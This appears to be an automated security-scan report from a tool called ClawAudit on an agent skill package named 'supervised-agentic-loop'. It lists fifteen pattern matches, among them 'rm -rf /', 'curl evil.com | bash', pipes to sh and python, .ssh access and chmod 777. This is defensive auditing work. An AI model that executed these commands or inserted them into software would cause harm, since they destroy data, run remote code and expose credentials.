ClawAudit verdict
supervised-agentic-loop
Self-improving agent loop that is LOCAL by default; the only network access (Telegram alerts) is explicitly opt-in via env vars, with all behavior transparent and documented.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Permission integrity
network_out
Findings (15)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Pipe to sh — executes piped content as shell commands
sal/monitor/behaviors.py · prose · downgraded · |sh
Pipe to python — executes piped content as Python code
sal/monitor/behaviors.py · prose · downgraded · |python
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
sal/monitor/heartbeat.py · prose · downgraded · curl evil.com | bash
Pipe to bash — executes piped content as shell commands
sal/monitor/heartbeat.py · prose · downgraded · | bash
Popular HTTP library — network access
AUTOEVOLVE_CONCEPT.md · code · got
subprocess execution — runs system commands from Python
sal/contract.py · prose · downgraded · subprocess.run(
setuid — privilege escalation mechanism
sal/monitor/behaviors.py · prose · downgraded · setuid
Accesses .ssh directory
sal/monitor/behaviors.py · prose · downgraded · .ssh/
References sudo — requests elevated privileges
sal/monitor/heartbeat.py · prose · downgraded · sudo
Python urllib.request — network access
sal/monitor/alerter.py · prose · downgraded · urllib.request
Python os.environ.get — reads environment variable
sal/monitor/alerter.py · prose · downgraded · os.environ.get(
References tunneling service
sal/monitor/behaviors.py · prose · downgraded · ngrok
Base64 encoding/decoding
tests/test_monitor_behaviors.py · prose · downgraded · base64_decode
Sets world-executable permissions
tests/test_monitor_monitor.py · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/D/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 2 system binaries. (1 elevated: git).
network_out Is this flag fair?
Thanks — recorded.